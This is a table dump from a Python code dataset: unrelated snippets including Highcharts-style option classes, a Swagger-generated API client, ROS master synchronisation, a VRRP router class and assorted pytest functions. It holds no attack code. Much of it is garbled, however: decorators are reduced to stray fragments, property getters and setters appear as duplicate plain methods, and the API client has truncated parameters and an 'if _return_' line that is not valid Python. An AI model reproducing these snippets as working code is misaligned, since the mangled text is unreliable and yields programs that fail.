code stringlengths 281 23.7M |
|---|
def _add_mail_adress_score(string, score):
regex = '(([^<>()[\\]\\\\.,;:\\\\"]+(\\.[^<>()[\\]\\\\.,;:\\\\"]+)*)|(\\".+\\"))((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))'
match = re.search(regex, string)
return ((score + 150) if match else score) |
class OptionPlotoptionsHeatmapSonificationContexttracksMappingGapbetweennotes(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def test_require6(evmtester, branch_results):
evmtester.requireBranches(6, False, False, False, False)
results = branch_results()
for i in [1813, 1850, 1896, 1902, 1908, 1933, 1939, 1945]:
assert ([i, (i + 1)] in results[True])
with pytest.raises(VirtualMachineError):
evmtester.requireBranches(6, True, False, False, False)
results = branch_results()
for i in [1819, 1856]:
assert ([i, (i + 1)] in results[True])
for i in [1813, 1850, 1896]:
assert ([i, (i + 1)] in results[False])
with pytest.raises(VirtualMachineError):
evmtester.requireBranches(6, False, True, False, False)
results = branch_results()
for i in [1813, 1850, 1896]:
assert ([i, (i + 1)] in results[True])
assert ([1902, 1903] in results[False])
with pytest.raises(VirtualMachineError):
evmtester.requireBranches(6, False, False, True, False)
results = branch_results()
for i in [1813, 1850, 1896, 1902]:
assert ([i, (i + 1)] in results[True])
assert ([1908, 1909] in results[False]) |
class OptionSeriesAreaDataDatalabels(Options):
def align(self):
return self._config_get('center')
def align(self, text: str):
self._config(text, js_type=False)
def allowOverlap(self):
return self._config_get(False)
def allowOverlap(self, flag: bool):
self._config(flag, js_type=False)
def animation(self) -> 'OptionSeriesAreaDataDatalabelsAnimation':
return self._config_sub_data('animation', OptionSeriesAreaDataDatalabelsAnimation)
def backgroundColor(self):
return self._config_get(None)
def backgroundColor(self, text: str):
self._config(text, js_type=False)
def borderColor(self):
return self._config_get(None)
def borderColor(self, text: str):
self._config(text, js_type=False)
def borderRadius(self):
return self._config_get(0)
def borderRadius(self, num: float):
self._config(num, js_type=False)
def borderWidth(self):
return self._config_get(0)
def borderWidth(self, num: float):
self._config(num, js_type=False)
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def crop(self):
return self._config_get(True)
def crop(self, flag: bool):
self._config(flag, js_type=False)
def defer(self):
return self._config_get(True)
def defer(self, flag: bool):
self._config(flag, js_type=False)
def enabled(self):
return self._config_get(False)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def filter(self) -> 'OptionSeriesAreaDataDatalabelsFilter':
return self._config_sub_data('filter', OptionSeriesAreaDataDatalabelsFilter)
def format(self):
return self._config_get('point.value')
def format(self, text: str):
self._config(text, js_type=False)
def formatter(self):
return self._config_get(None)
def formatter(self, value: Any):
self._config(value, js_type=False)
def inside(self):
return self._config_get(None)
def inside(self, flag: bool):
self._config(flag, js_type=False)
def nullFormat(self):
return self._config_get(None)
def nullFormat(self, flag: bool):
self._config(flag, js_type=False)
def nullFormatter(self):
return self._config_get(None)
def nullFormatter(self, value: Any):
self._config(value, js_type=False)
def overflow(self):
return self._config_get('justify')
def overflow(self, text: str):
self._config(text, js_type=False)
def padding(self):
return self._config_get(5)
def padding(self, num: float):
self._config(num, js_type=False)
def position(self):
return self._config_get('center')
def position(self, text: str):
self._config(text, js_type=False)
def rotation(self):
return self._config_get(0)
def rotation(self, num: float):
self._config(num, js_type=False)
def shadow(self):
return self._config_get(False)
def shadow(self, flag: bool):
self._config(flag, js_type=False)
def shape(self):
return self._config_get('square')
def shape(self, text: str):
self._config(text, js_type=False)
def style(self):
return self._config_get(None)
def style(self, value: Any):
self._config(value, js_type=False)
def textPath(self) -> 'OptionSeriesAreaDataDatalabelsTextpath':
return self._config_sub_data('textPath', OptionSeriesAreaDataDatalabelsTextpath)
def useHTML(self):
return self._config_get(False)
def useHTML(self, flag: bool):
self._config(flag, js_type=False)
def verticalAlign(self):
return self._config_get('bottom')
def verticalAlign(self, text: str):
self._config(text, js_type=False)
def x(self):
return self._config_get(0)
def x(self, num: float):
self._config(num, js_type=False)
def y(self):
return self._config_get(0)
def y(self, num: float):
self._config(num, js_type=False)
def zIndex(self):
return self._config_get(6)
def zIndex(self, num: float):
self._config(num, js_type=False) |
class ApiClient(object):
PRIMITIVE_TYPES = ((float, bool, bytes, six.text_type) + six.integer_types)
NATIVE_TYPES_MAPPING = {'int': int, 'long': (int if six.PY3 else long), 'float': float, 'str': str, 'bool': bool, 'date': datetime.date, 'datetime': datetime.datetime, 'object': object}
def __init__(self, configuration=None, header_name=None, header_value=None, cookie=None):
if (configuration is None):
configuration = Configuration()
self.configuration = configuration
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if (header_name is not None):
self.default_headers[header_name] = header_value
self.cookie = cookie
self.user_agent = 'Swagger-Codegen/4.0/python'
def __del__(self):
if (self._pool is not None):
self._pool.close()
self._pool.join()
def pool(self):
if (self._pool is None):
self._pool = ThreadPool()
return self._pool
def user_agent(self):
return self.default_headers['User-Agent']
_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None, post_params=None, files=None, response_type=None, auth_settings=None, _return_ collection_formats=None, _preload_content=True, _request_timeout=None):
config = self.configuration
header_params = (header_params or {})
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params, collection_formats))
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params, collection_formats)
for (k, v) in path_params:
resource_path = resource_path.replace(('{%s}' % k), quote(str(v), safe=config.safe_chars_for_path_param))
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params, collection_formats)
if (post_params or files):
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params, collection_formats)
self.update_params_for_auth(header_params, query_params, auth_settings)
if body:
body = self.sanitize_for_serialization(body)
url = (self.configuration.host + resource_path)
response_data = self.request(method, url, query_params=query_params, headers=header_params, post_params=post_params, body=body, _preload_content=_preload_content, _request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_
return return_data
else:
return (return_data, response_data.status, response_data.getheaders())
def sanitize_for_serialization(self, obj):
if (obj is None):
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj) for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple((self.sanitize_for_serialization(sub_obj) for sub_obj in obj))
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr) for (attr, _) in six.iteritems(obj.swagger_types) if (getattr(obj, attr) is not None)}
return {key: self.sanitize_for_serialization(val) for (key, val) in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
if (response_type == 'file'):
return self.__deserialize_file(response)
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
if (data is None):
return None
if isinstance(klass, str):
if klass.startswith('list['):
sub_kls = re.match('list\\[(.*)\\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls) for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match('dict\\(([^,]*), (.*)\\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls) for (k, v) in six.iteritems(data)}
if (klass in self.NATIVE_TYPES_MAPPING):
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(models, klass)
if (klass in self.PRIMITIVE_TYPES):
return self.__deserialize_primitive(data, klass)
elif (klass == object):
return self.__deserialize_object(data)
elif (klass == datetime.date):
return self.__deserialize_date(data)
elif (klass == datetime.datetime):
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None, post_params=None, files=None, response_type=None, auth_settings=None, async_req=None, _return_ collection_formats=None, _preload_content=True, _request_timeout=None):
if (not async_req):
return self.__call_api(resource_path, method, path_params, query_params, header_params, body, post_params, files, response_type, auth_settings, _return_ collection_formats, _preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path, method, path_params, query_params, header_params, body, post_params, files, response_type, auth_settings, _return_ collection_formats, _preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None, post_params=None, body=None, _preload_content=True, _request_timeout=None):
if (method == 'GET'):
return self.rest_client.GET(url, query_params=query_params, _preload_content=_preload_content, _request_timeout=_request_timeout, headers=headers)
elif (method == 'HEAD'):
return self.rest_client.HEAD(url, query_params=query_params, _preload_content=_preload_content, _request_timeout=_request_timeout, headers=headers)
elif (method == 'OPTIONS'):
return self.rest_client.OPTIONS(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
elif (method == 'POST'):
return self.rest_client.POST(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
elif (method == 'PUT'):
return self.rest_client.PUT(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
elif (method == 'PATCH'):
return self.rest_client.PATCH(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
elif (method == 'DELETE'):
return self.rest_client.DELETE(url, query_params=query_params, headers=headers, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
else:
raise ValueError('http method must be `GET`, `HEAD`, `OPTIONS`, `POST`, `PATCH`, `PUT` or `DELETE`.')
def parameters_to_tuples(self, params, collection_formats):
new_params = []
if (collection_formats is None):
collection_formats = {}
for (k, v) in (six.iteritems(params) if isinstance(params, dict) else params):
if (k in collection_formats):
collection_format = collection_formats[k]
if (collection_format == 'multi'):
new_params.extend(((k, value) for value in v))
else:
if (collection_format == 'ssv'):
delimiter = ' '
elif (collection_format == 'tsv'):
delimiter = '\t'
elif (collection_format == 'pipes'):
delimiter = '|'
else:
delimiter = ','
new_params.append((k, delimiter.join((str(value) for value in v))))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
params = []
if post_params:
params = post_params
if files:
for (k, v) in six.iteritems(files):
if (not v):
continue
file_names = (v if isinstance(v, list) else [v])
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')
params.append(tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
if (not accepts):
return
accepts = [x.lower() for x in accepts]
if ('application/json' in accepts):
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
if (not content_types):
return 'application/json'
content_types = [x.lower() for x in content_types]
if (('application/json' in content_types) or ('*/*' in content_types)):
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
if (not auth_settings):
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if (not auth_setting['value']):
continue
elif (auth_setting['in'] == 'header'):
headers[auth_setting['key']] = auth_setting['value']
elif (auth_setting['in'] == 'query'):
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError('Authentication token must be in `query` or `header`')
def __deserialize_file(self, response):
(fd, path) = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader('Content-Disposition')
if content_disposition:
filename = re.search('filename=[\\\'"]?([^\\\'"\\s]+)[\\\'"]?', content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, 'wb') as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
return value
def __deserialize_date(self, string):
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(status=0, reason='Failed to parse `{0}` as date object'.format(string))
def __deserialize_datatime(self, string):
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(status=0, reason='Failed to parse `{0}` as datetime object'.format(string))
def __hasattr(self, object, name):
return (name in object.__class__.__dict__)
def __deserialize_model(self, data, klass):
if ((not klass.swagger_types) and (not self.__hasattr(klass, 'get_real_child_model'))):
return data
kwargs = {}
if (klass.swagger_types is not None):
for (attr, attr_type) in six.iteritems(klass.swagger_types):
if ((data is not None) and (klass.attribute_map[attr] in data) and isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and (klass.swagger_types is not None) and isinstance(data, dict)):
for (key, value) in data.items():
if (key not in klass.swagger_types):
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance |
class Main(object):
UPDATE_INTERVALL = 30
def __init__(self):
self.masters = {}
self.masteruri = masteruri_from_master()
self.hostname = get_hostname(self.masteruri)
self._localname = ''
self.__lock = threading.RLock()
self._load_interface()
self._check_host = rospy.get_param('~check_host', True)
topic_names = interface_finder.get_changes_topic(masteruri_from_master(), check_host=self._check_host)
self.sub_changes = dict()
for topic_name in topic_names:
rospy.loginfo('listen for updates on %s', topic_name)
self.sub_changes[topic_name] = rospy.Subscriber(topic_name, MasterState, self._rosmsg_callback_master_state)
self.__timestamp_local = None
self.__own_state = None
self.update_timer = None
self.resync_timer = None
self.own_state_getter = None
self._timer_update_diagnostics = None
self._join_threads = dict()
rospy.Service('~get_sync_info', GetSyncInfo, self._rosservice_get_sync_info)
rospy.on_shutdown(self.finish)
self._current_diagnistic_level = None
self.pub_diag = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=10, latch=True)
self.obtain_masters()
def _rosmsg_callback_master_state(self, data):
with self.__lock:
if (not rospy.is_shutdown()):
if (data.state in [MasterState.STATE_REMOVED]):
self.remove_master(data.master.name)
elif (data.state in [MasterState.STATE_NEW, MasterState.STATE_CHANGED]):
m = data.master
self.update_master(m.name, m.uri, m.last_change.to_sec(), m.last_change_local.to_sec(), m.discoverer_name, m.monitoruri, m.online)
def _callback_perform_resync(self):
if (self.resync_timer is not None):
self.resync_timer.cancel()
self.resync_timer = threading.Timer(0.1, self._perform_resync)
self.resync_timer.start()
def obtain_masters(self):
if (not rospy.is_shutdown()):
service_names = interface_finder.get_listmaster_service(masteruri_from_master(), False, check_host=self._check_host)
for service_name in service_names:
try:
with self.__lock:
try:
socket.setdefaulttimeout(5)
discoverMasters = rospy.ServiceProxy(service_name, DiscoverMasters)
resp = discoverMasters()
masters = []
master_names = [m.name for m in resp.masters]
rospy.loginfo("ROS masters obtained from '%s': %s", service_name, master_names)
for m in resp.masters:
if self._can_sync(m.name):
masters.append(m.name)
self.update_master(m.name, m.uri, m.last_change.to_sec(), m.last_change_local.to_sec(), m.discoverer_name, m.monitoruri, m.online)
for key in (set(self.masters.keys()) - set(masters)):
self.remove_master(self.masters[key].name)
except rospy.ServiceException as e:
rospy.logwarn("ERROR Service call 'list_masters' failed: %s", str(e))
except:
import traceback
rospy.logwarn('ERROR while initial list masters: %s', traceback.format_exc())
finally:
socket.setdefaulttimeout(None)
self.update_timer = threading.Timer(self.UPDATE_INTERVALL, self.obtain_masters)
self.update_timer.start()
def update_master(self, mastername, masteruri, timestamp, timestamp_local, discoverer_name, monitoruri, online):
try:
with self.__lock:
if (masteruri != self.masteruri):
if self._can_sync(mastername):
if (self.__resync_on_reconnect and (mastername in self.masters)):
self.masters[mastername].set_online(online, self.__resync_on_reconnect_timeout)
if online:
if (mastername in self.masters):
self.masters[mastername].update(mastername, masteruri, discoverer_name, monitoruri, timestamp_local)
else:
self.masters[mastername] = SyncThread(mastername, masteruri, discoverer_name, monitoruri, 0.0, self.__sync_topics_on_demand, callback_resync=self._callback_perform_resync)
if (self.__own_state is not None):
self.masters[mastername].set_own_masterstate(MasterInfo.from_list(self.__own_state))
self.masters[mastername].update(mastername, masteruri, discoverer_name, monitoruri, timestamp_local)
elif (self.__timestamp_local != timestamp_local):
self._localname = mastername
self.own_state_getter = threading.Thread(target=self.get_own_state, args=(monitoruri,))
self.own_state_getter.start()
if ((self._timer_update_diagnostics is None) or (not self._timer_update_diagnostics.is_alive())):
self._timer_update_diagnostics = threading.Thread(target=self._update_diagnostics_state)
self._timer_update_diagnostics.start()
except:
import traceback
rospy.logwarn('ERROR while update master[%s]: %s', str(mastername), traceback.format_exc())
def get_own_state(self, monitoruri):
try:
socket.setdefaulttimeout(3)
own_monitor = xmlrpcclient.ServerProxy(monitoruri)
self.__own_state = own_monitor.masterInfo()
own_state = MasterInfo.from_list(self.__own_state)
socket.setdefaulttimeout(None)
with self.__lock:
for (_, s) in self.masters.items():
s.set_own_masterstate(own_state, self.__sync_topics_on_demand)
self.__timestamp_local = own_state.timestamp_local
except:
import traceback
rospy.logwarn("ERROR while getting own state from '%s': %s", monitoruri, traceback.format_exc())
socket.setdefaulttimeout(None)
time.sleep(3)
if ((self.own_state_getter is not None) and (not rospy.is_shutdown())):
self.own_state_getter = threading.Thread(target=self.get_own_state, args=(monitoruri,))
self.own_state_getter.start()
def remove_master(self, ros_master_name):
try:
with self.__lock:
if (ros_master_name in self.masters):
m = self.masters.pop(ros_master_name)
ident = uuid.uuid4()
thread = threading.Thread(target=self._threading_stop_sync, args=(m, ident))
self._join_threads[ident] = thread
thread.start()
except Exception:
import traceback
rospy.logwarn('ERROR while removing master[%s]: %s', ros_master_name, traceback.format_exc())
def _threading_stop_sync(self, sync_thread, ident):
if isinstance(sync_thread, SyncThread):
rospy.loginfo((' Stop synchronization to `%s`' % sync_thread.name))
sync_thread.stop()
with self.__lock:
del self._join_threads[ident]
rospy.loginfo((' Finished synchronization to `%s`' % sync_thread.name))
del sync_thread
def finish(self, msg=''):
rospy.loginfo('Stop synchronization...')
with self.__lock:
rospy.loginfo(' Stop timers...')
if (self.update_timer is not None):
self.update_timer.cancel()
if (self.resync_timer is not None):
self.resync_timer.cancel()
rospy.loginfo(' Unregister from master discovery...')
for (_, v) in self.sub_changes.items():
v.unregister()
self.own_state_getter = None
for key in self.masters.keys():
rospy.loginfo(' Remove master: %s', key)
self.remove_master(key)
while (len(self._join_threads) > 0):
rospy.loginfo(' Wait for ending of %s threads ...', str(len(self._join_threads)))
time.sleep(1)
rospy.loginfo('Synchronization is now off')
def _perform_resync(self):
self.resync_timer = None
with self.__lock:
for (_, s) in self.masters.items():
s.perform_resync()
def _rosservice_get_sync_info(self, req):
masters = list()
try:
with self.__lock:
for (_, s) in self.masters.items():
masters.append(s.get_sync_info())
except:
import traceback
traceback.print_exc()
finally:
return GetSyncInfoResponse(masters)
def _load_interface(self):
interface_file = resolve_url(rospy.get_param('~interface_url', ''))
if interface_file:
rospy.loginfo('interface_url: %s', interface_file)
try:
data = (read_interface(interface_file) if interface_file else {})
self._re_ignore_hosts = create_pattern('ignore_hosts', data, interface_file, [])
self._re_sync_hosts = create_pattern('sync_hosts', data, interface_file, [])
self.__sync_topics_on_demand = False
if interface_file:
if ('sync_topics_on_demand' in data):
self.__sync_topics_on_demand = data['sync_topics_on_demand']
elif rospy.has_param('~sync_topics_on_demand'):
self.__sync_topics_on_demand = rospy.get_param('~sync_topics_on_demand')
rospy.loginfo('sync_topics_on_demand: %s', self.__sync_topics_on_demand)
self.__resync_on_reconnect = rospy.get_param('~resync_on_reconnect', True)
rospy.loginfo('resync_on_reconnect: %s', self.__resync_on_reconnect)
self.__resync_on_reconnect_timeout = rospy.get_param('~resync_on_reconnect_timeout', 0)
rospy.loginfo('resync_on_reconnect_timeout: %s', self.__resync_on_reconnect_timeout)
except:
import traceback
rospy.logerr('Error on load interface: %s', traceback.format_exc())
import os
import signal
os.kill(os.getpid(), signal.SIGKILL)
def _can_sync(self, mastername):
result = False
if is_empty_pattern(self._re_ignore_hosts):
if is_empty_pattern(self._re_sync_hosts):
result = True
elif (self._re_sync_hosts.match(mastername) is not None):
result = True
elif (self._re_ignore_hosts.match(mastername) is None):
result = True
elif (not is_empty_pattern(self._re_sync_hosts)):
if (self._re_sync_hosts.match(mastername) is not None):
result = True
return result
def _update_diagnostics_state(self):
md5_warnings = {}
ttype_warnings = {}
for (mname, mth) in self.masters.items():
warnings = mth.get_md5warnigs()
if warnings:
md5_warnings[mname] = warnings
twarnings = mth.get_topic_type_warnings()
if twarnings:
ttype_warnings[mname] = twarnings
level = 0
if (md5_warnings or ttype_warnings):
level = 1
if (self._current_diagnistic_level != level):
da = DiagnosticArray()
if (md5_warnings or ttype_warnings):
for (mname, warnings) in md5_warnings.items():
diag_state = DiagnosticStatus()
diag_state.level = level
diag_state.name = rospy.get_name()
diag_state.message = ('Wrong topic md5sum %s and %s' % (mname, self._localname))
diag_state.hardware_id = self.hostname
for ((topicname, _node, _nodeuri), tmtype) in warnings.items():
if isinstance(tmtype, tuple):
(md5sum, ttype) = tmtype
if (md5sum is not None):
key = KeyValue()
key.key = topicname
key.value = str(ttype)
diag_state.values.append(key)
da.status.append(diag_state)
for (mname, warnings) in ttype_warnings.items():
diag_state = DiagnosticStatus()
diag_state.level = level
diag_state.name = rospy.get_name()
diag_state.message = ('Wrong topics type %s and %s' % (mname, self._localname))
diag_state.hardware_id = self.hostname
for ((topicname, _node, _nodeuri), tmtype) in warnings.items():
ttype = tmtype
if isinstance(tmtype, tuple):
(md5sum, ttype) = tmtype
key = KeyValue()
key.key = topicname
key.value = str(ttype)
diag_state.values.append(key)
da.status.append(diag_state)
else:
diag_state = DiagnosticStatus()
diag_state.level = 0
diag_state.name = rospy.get_name()
diag_state.message = ''
diag_state.hardware_id = self.hostname
da.status.append(diag_state)
da.header.stamp = rospy.Time.now()
self.pub_diag.publish(da)
self._current_diagnistic_level = level |
class RouterIPV4Linux(RouterIPV4):
def __init__(self, *args, **kwargs):
super(RouterIPV4Linux, self).__init__(*args, **kwargs)
assert isinstance(self.interface, vrrp_event.VRRPInterfaceNetworkDevice)
self.__is_master = False
self._arp_thread = None
def start(self):
self._disable_router()
super(RouterIPV4Linux, self).start()
def _initialized_to_master(self):
self.logger.debug('initialized to master')
self._master()
def _become_master(self):
self.logger.debug('become master')
self._master()
def _master(self):
self.__is_master = True
self._enable_router()
self._send_garp()
def _become_backup(self):
self.logger.debug('become backup')
self.__is_master = False
self._disable_router()
def _shutdowned(self):
self._disable_router()
def _arp_loop_socket(self, packet_socket):
while True:
try:
buf = packet_socket.recv(1500)
except socket.timeout:
continue
self._arp_process(buf)
def _arp_loop(self):
try:
with contextlib.closing(socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ether.ETH_TYPE_ARP))) as packet_socket:
packet_socket.bind((self.interface.device_name, socket.htons(ether.ETH_TYPE_ARP), socket.PACKET_BROADCAST, arp.ARP_HW_TYPE_ETHERNET, mac_lib.BROADCAST))
self._arp_loop_socket(packet_socket)
except greenlet.GreenletExit:
pass
def _enable_router(self):
if (self._arp_thread is None):
self._arp_thread = hub.spawn(self._arp_loop)
self.logger.debug('TODO:_enable_router')
def _disable_router(self):
if (self._arp_thread is not None):
self._arp_thread.kill()
hub.joinall([self._arp_thread])
self._arp_thread = None
self.logger.debug('TODO:_disable_router') |
def clear_pi_system_pi_web_api(host, admin, password, pi_database, af_hierarchy_list, asset_dict):
print('Going to delete the element hierarchy list {}.'.format(af_hierarchy_list))
delete_element_hierarchy(host, admin, password, pi_database, af_hierarchy_list)
print('Deleted the element hierarchy list {}.'.format(af_hierarchy_list))
for asset_name in asset_dict.keys():
for dp_name in asset_dict[asset_name]:
print('Going to delete the PI point. with name {}.{}'.format(asset_name, dp_name))
delete_pi_point(host, admin, password, asset_name, dp_name)
print('Deleted the PI point. with name {}.{}'.format(asset_name, dp_name))
for h_level in af_hierarchy_list:
web_ids = search_for_element_template(host, admin, password, pi_database, h_level)
print('Going to delete the element template with name {} and web ids {}'.format(h_level, web_ids))
for web_id in web_ids:
delete_element_template(host, admin, password, web_id)
print('Deleted the element template with name {} and web ids {}'.format(h_level, web_ids))
clear_cache(host, admin, password, pi_database)
print('Cleared the cache of Pi system.') |
def test_no_summary_seeking(tmpdir: Path):
filepath = (tmpdir / 'no_summary.mcap')
write_no_summary_mcap(filepath)
with open(filepath, 'rb') as f:
reader = SeekingReader(f)
assert (len(list(reader.iter_messages())) == 200)
assert (len(list(reader.iter_attachments())) == 1)
assert (len(list(reader.iter_metadata())) == 1) |
def _find_common_alerts(first_alerts: Union[(List[PendingTestAlertSchema], List[PendingModelAlertSchema], List[PendingSourceFreshnessAlertSchema])], second_alerts: Union[(List[PendingTestAlertSchema], List[PendingModelAlertSchema], List[PendingSourceFreshnessAlertSchema])]) -> Union[(List[PendingTestAlertSchema], List[PendingModelAlertSchema], List[PendingSourceFreshnessAlertSchema])]:
first_hashable_alerts = [alert.json(sort_keys=True) for alert in first_alerts]
second_hashable_alerts = [alert.json(sort_keys=True) for alert in second_alerts]
common_hashable_alerts = [json.loads(alert) for alert in list((set(first_hashable_alerts) & set(second_hashable_alerts)))]
common_alert_ids = [alert['id'] for alert in common_hashable_alerts]
common_alerts = []
alert_ids_already_handled = []
for alert in [*first_alerts, *second_alerts]:
if ((alert.id in common_alert_ids) and (alert.id not in alert_ids_already_handled)):
common_alerts.append(alert)
alert_ids_already_handled.append(alert.id)
return common_alerts |
def common_stuff(request):
from core.version import __version__, __edition__
from gui.node.utils import get_dc1_settings
from api.system.update.api_views import UpdateView
return {'settings': settings, 'dc_settings': request.dc.settings, 'dc1_settings': get_dc1_settings(request), 'ANALYTICS': (None if request.user.is_authenticated() else settings.ANALYTICS), 'DEBUG': _get_debug_settings(), 'SOCKETIO_URL': settings.SOCKETIO_URL, 'THIRD_PARTY_JS': get_third_party_js(), 'THIRD_PARTY_CSS': get_third_party_css(), 'SYSTEM_UPDATE_RUNNING': UpdateView.is_task_running(), 'SYSTEM_VERSION': __version__, 'SYSTEM_EDITION': __edition__} |
def test_injection():
resource = object()
def _init():
_init.counter += 1
return resource
_init.counter = 0
class Container(containers.DeclarativeContainer):
resource = providers.Resource(_init)
dependency1 = providers.List(resource)
dependency2 = providers.List(resource)
container = Container()
list1 = container.dependency1()
list2 = container.dependency2()
assert (list1 == [resource])
assert (list1[0] is resource)
assert (list2 == [resource])
assert (list2[0] is resource)
assert (_init.counter == 1) |
class BrowserPlugin(Plugin):
VIEWS = 'envisage.ui.workbench.views'
name = 'TVTK Pipeline Browser'
id = 'tvtk.browser'
views = List(contributes_to=VIEWS)
def _views_default(self):
return [self._browser_view_factory]
def _browser_view_factory(self, window, **traits):
from tvtk.plugins.browser.browser_view import BrowserView
browser_view = BrowserView(scene_manager=self._get_scene_manager(window), window=window, **traits)
return browser_view
def _get_scene_manager(self, window):
from tvtk.plugins.scene.i_scene_manager import ISceneManager
return window.get_service(ISceneManager) |
.unit
class TestLoggerPii():
(scope='function')
def log_pii_true(self) -> None:
original_value = CONFIG.logging.log_pii
CONFIG.logging.log_pii = True
(yield)
CONFIG.logging.log_pii = original_value
(scope='function')
def log_pii_false(self) -> None:
original_value = CONFIG.logging.log_pii
CONFIG.logging.log_pii = False
(yield)
CONFIG.logging.log_pii = original_value
.usefixtures('log_pii_false')
def test_logger_masks_pii(self) -> None:
some_data = 'some_data'
result = '{}'.format(Pii(some_data))
assert (result == MASKED)
.usefixtures('log_pii_true')
def test_logger_doesnt_mask_pii(self) -> None:
some_data = 'some_data'
result = '{}'.format(Pii(some_data))
assert (result == 'some_data') |
class BMGNode(ABC):
inputs: InputList
outputs: ItemCounter
def __init__(self, inputs: List['BMGNode']):
assert isinstance(inputs, list)
self.inputs = InputList(self, inputs)
self.outputs = ItemCounter()
def is_leaf(self) -> bool:
return (len(self.outputs.items) == 0) |
def main():
(X, y) = datasets.make_classification(n_samples=1000, n_features=10, n_classes=4, n_clusters_per_class=1, n_informative=2)
data = datasets.load_iris()
X = normalize(data.data)
y = data.target
y = to_categorical(y.astype('int'))
def model_builder(n_inputs, n_outputs):
model = NeuralNetwork(optimizer=Adam(), loss=CrossEntropy)
model.add(Dense(16, input_shape=(n_inputs,)))
model.add(Activation('relu'))
model.add(Dense(n_outputs))
model.add(Activation('softmax'))
return model
print('')
model_builder(n_inputs=X.shape[1], n_outputs=y.shape[1]).summary()
population_size = 100
n_generations = 10
(X_train, X_test, y_train, y_test) = train_test_split(X, y, test_size=0.4, seed=1)
inertia_weight = 0.8
cognitive_weight = 0.8
social_weight = 0.8
print(('Population Size: %d' % population_size))
print(('Generations: %d' % n_generations))
print('')
print(('Inertia Weight: %.2f' % inertia_weight))
print(('Cognitive Weight: %.2f' % cognitive_weight))
print(('Social Weight: %.2f' % social_weight))
print('')
